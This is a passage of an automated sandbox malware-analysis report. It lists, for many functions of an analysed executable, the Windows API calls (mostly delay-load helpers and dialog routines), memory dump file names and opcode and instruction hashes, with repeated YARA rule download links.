Opcode Fuzzy Hash: 437868731403efeadc6703a3238980ff19aa414d0bb76ba2c9d0c6fc557da918
Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8

Function 0018B862 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 9597e450bb270be3fde922d8629f25d6df7f6758fe0b791f3a35d0bb5277907b
Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
Opcode Fuzzy Hash: 9597e450bb270be3fde922d8629f25d6df7f6758fe0b791f3a35d0bb5277907b
Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8

Function 0018B88A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: e40295607c732942714d065e1fa978be3901efca43818cad95dab046aa581c26
Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
Opcode Fuzzy Hash: e40295607c732942714d065e1fa978be3901efca43818cad95dab046aa581c26
Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8

Function 0018B880 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 24c639a33d0e450b0be7ace32748cfa07bb48d413d082a47c2a26fc75b81a581
Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
Opcode Fuzzy Hash: 24c639a33d0e450b0be7ace32748cfa07bb48d413d082a47c2a26fc75b81a581
Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8

Function 0018B9AC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 8172e98aae21330cf0e4087c0896b05d68b5a47a3d3cb8d0f24614f16fa8c56a
Instruction ID: 9141cd8e7e26713bb849af0b396849286befd91fea5a7f294155f7a6ee4b58f9
Opcode Fuzzy Hash: 8172e98aae21330cf0e4087c0896b05d68b5a47a3d3cb8d0f24614f16fa8c56a
Instruction Fuzzy Hash: 1EA012D566C1103C740831401C86C37010CC1C1B143B04119F50084040A74029400A30

Function 0018B9D1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 74929dbb75887e5b8470af770b6bce616a96f26138f9b73ae46559148d10b90f
Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
Opcode Fuzzy Hash: 74929dbb75887e5b8470af770b6bce616a96f26138f9b73ae46559148d10b90f
Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30

Function 0018B9C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 780db0fcdcf147d78381fad5f356b62394889101350c9e6800280f478bb401aa
Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
Opcode Fuzzy Hash: 780db0fcdcf147d78381fad5f356b62394889101350c9e6800280f478bb401aa
Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30

Function 0018B9F9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 5dbf04bffc3fec38f845119ab95e3c7caf224099722c1a3604d5bc6bad5bbaf4
Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
Opcode Fuzzy Hash: 5dbf04bffc3fec38f845119ab95e3c7caf224099722c1a3604d5bc6bad5bbaf4
Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30

Function 0018B9EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 0619cb05f9749757ecebd2fe036cda94df2f0d7b2a9ff6316c1c9521a3a5667f
Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
Opcode Fuzzy Hash: 0619cb05f9749757ecebd2fe036cda94df2f0d7b2a9ff6316c1c9521a3a5667f
Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30

Function 0018BA03 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: f5af8d2324467be4a1811de9172f7ebc1e4eb40122e8a29b67332775e000c063
Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
Opcode Fuzzy Hash: f5af8d2324467be4a1811de9172f7ebc1e4eb40122e8a29b67332775e000c063
Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30

Function 0018BABB Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: ba224b9af7c854849b632a043b09eab229dbc25978e7b8b1af555cf2981cb626
Instruction ID: a2b6c98560b681944de99d19277aa61086628425b2ee09516a41439a74a9b4d5
Opcode Fuzzy Hash: ba224b9af7c854849b632a043b09eab229dbc25978e7b8b1af555cf2981cb626
Instruction Fuzzy Hash: 9BA012C926C0027C710C31501C42C36011CC1D5B103708509F011C4040974029002970

Function 0018BAD9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 0100addc0184b07fd7ed232690ba4b7047038cdc79b189787f4882bc041d3dd2
Instruction ID: a2b6c98560b681944de99d19277aa61086628425b2ee09516a41439a74a9b4d5
Opcode Fuzzy Hash: 0100addc0184b07fd7ed232690ba4b7047038cdc79b189787f4882bc041d3dd2
Instruction Fuzzy Hash: 9BA012C926C0027C710C31501C42C36011CC1D5B103708509F011C4040974029002970

Function 0018BAED Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 0d4962214e1fd5c5c50729344eacbdcdd43515b3b686bb4e982b5a7e1a8909cf
Instruction ID: a2b6c98560b681944de99d19277aa61086628425b2ee09516a41439a74a9b4d5
Opcode Fuzzy Hash: 0d4962214e1fd5c5c50729344eacbdcdd43515b3b686bb4e982b5a7e1a8909cf
Instruction Fuzzy Hash: 9BA012C926C0027C710C31501C42C36011CC1D5B103708509F011C4040974029002970

Function 0018BAE3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 595ed4b99dd33fcce1c6f6a12d1c17fc813b0acd6cb3f460e356feaa12eb7766
Instruction ID: a2b6c98560b681944de99d19277aa61086628425b2ee09516a41439a74a9b4d5
Opcode Fuzzy Hash: 595ed4b99dd33fcce1c6f6a12d1c17fc813b0acd6cb3f460e356feaa12eb7766
Instruction Fuzzy Hash: 9BA012C926C0027C710C31501C42C36011CC1D5B103708509F011C4040974029002970

Function 00171B1B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,?,?), ref: 00171B30

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ItemText
String ID:
API String ID: 3367045223-0
Opcode ID: 4c4f61d42b6e8014f096bbb01881a259d731beb5931caccf466eebfce11e1861
Instruction ID: 111039b204413eb51cbba886b342ce0539a8d1239041c4ed2c213bd75b0dc566
Opcode Fuzzy Hash: 4c4f61d42b6e8014f096bbb01881a259d731beb5931caccf466eebfce11e1861
Instruction Fuzzy Hash: 71C00231108200FFDB05CF48E948D1ABBB6FB95315B11C558F058C6431C331D864DB66

Function 0018BAF2 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018BAFA

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 2a906cb056acdabf1e00866d1b6fafccb55b1d9cece4fed19936325066b8e4a3
Instruction ID: 3f51a1c067578a34d820c8cea4b31a4eb2fc5a1fc1d476c07f29a030100f2f3f
Opcode Fuzzy Hash: 2a906cb056acdabf1e00866d1b6fafccb55b1d9cece4fed19936325066b8e4a3
Instruction Fuzzy Hash: 41A002DABED1417DB10872917D47C3B061CC5D7F253748A5EF590C8481AB803D850971

Non-executed Functions

Function 00188590 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 275windowfileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0018859A

Part of subcall function 00171B78: GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
Part of subcall function 00171B78: SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0018861B
EndDialog.USER32(?,00000006), ref: 0018862E
GetDlgItem.USER32(?,0000006C), ref: 0018864A
SetFocus.USER32(00000000), ref: 00188651

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

Part of subcall function 00171B1B: SetDlgItemTextW.USER32(?,?,?), ref: 00171B30

SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001886C3
FindFirstFileW.KERNEL32(?,?), ref: 001886E3
FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00188786
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0018880D

Part of subcall function 00171170: _wcslen.LIBCMT ref: 0017117B

Strings

%s %s, xrefs: 001887C9, 001888FA
REPLACEFILEDLG, xrefs: 001885AF

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
String ID: %s %s$REPLACEFILEDLG
API String ID: 485132379-439456425
Opcode ID: b3ac8ab5f9da12c0e9275c51d68ebf8fc4a62f14c979cb99bf07810e003650f8
Instruction ID: d145bbd362b5f41a2cd0b92d16a14ff8223439630529e8f776b3a74105a1880d
Opcode Fuzzy Hash: b3ac8ab5f9da12c0e9275c51d68ebf8fc4a62f14c979cb99bf07810e003650f8
Instruction Fuzzy Hash: CDA15E71900218AAEB25EB64CD8AFEE777CAF25700F508095B609B7181EF719F85CF61

Function 0019AEFE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0019B044

Strings

1#QNAN, xrefs: 0019C24A
1#IND, xrefs: 0019C23C
1#INF, xrefs: 0019C251
1#SNAN, xrefs: 0019C243

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
